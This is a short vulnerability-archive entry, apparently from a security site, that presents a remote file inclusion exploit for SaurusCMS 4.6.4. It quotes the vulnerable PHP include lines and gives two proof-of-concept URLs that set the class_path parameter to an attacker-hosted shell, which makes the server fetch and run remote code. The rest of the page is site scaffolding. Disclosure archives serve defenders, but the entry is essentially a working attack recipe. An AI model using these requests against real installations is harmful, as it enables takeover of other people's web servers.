SaurusCMS 4.6.4 remote file inclusion

2009-12-23 / 2009-12-24
Credit: cr4wl3r
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

################################################################## ## Exploit Title: SaurusCMS <= 4.6.4 Multiple RFI Exploit ## ## Date: 19-12-2009 ## ## Author: cr4wl3r ## ## Software Link: http://www.saurus.info ## ## Version: N/A ## ## Tested on: GNU/LINUX ## ################################################################## ~ Code [class.writeexcel_workbook.inc.php] global $class_path; require_once $class_path."excel/class.writeexcel_biffwriter.inc.php"; require_once $class_path."excel/class.writeexcel_format.inc.php"; //require_once "class.writeexcel_formula.inc.php"; require_once $class_path."excel/class.writeexcel_olewriter.inc.php"; ~ PoC [SaurusCMS_path]/classes/excel/class.writeexcel_workbook.inc.php?class_path=[Shell] ~ Code [class.writeexcel_worksheet.inc.php] global $class_path; require_once $class_path."excel/class.writeexcel_biffwriter.inc.php"; ~ PoC [SaurusCMS_path]/classes/excel/class.writeexcel_worksheet.inc.php?class_path=[Shell]


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top